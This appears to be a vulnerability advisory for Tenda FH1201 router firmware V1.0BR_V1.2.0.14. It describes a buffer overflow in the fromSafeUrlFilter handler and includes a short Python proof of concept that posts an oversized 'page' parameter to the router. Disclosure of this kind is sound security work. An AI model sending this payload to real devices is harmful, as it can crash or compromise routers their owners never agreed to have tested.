Overview

• The device's official website: https://www.tenda.com.cn/product/overview/FH1201.html
• Firmware download website: https://www.tendacn.com/download/detail-3322.html

Affected version

FH1201 V1.0BR_V1.2.0.14

Vulnerability details

The Tenda FH1201 V1.0BR_V1.2.0.14 firmware has a buffer overflow vulnerability in the fromSafeUrlFilter function. The v11 variable receives the page parameter from a POST request and is later passed to the sprintf function. However, since the Since user can control the input of page, the statement sprintf(v16, "firewall_urlfilterlist.asp?page=%s", v11); can cause a buffer overflow.

POC

import requests

ip = "192.168.1.1"

url = f'http://{ip}/goform/fromSafeUrlFilter'
payload = b'a' * 1000
data = {
    'page':payload
}

requests.post(url, data=data)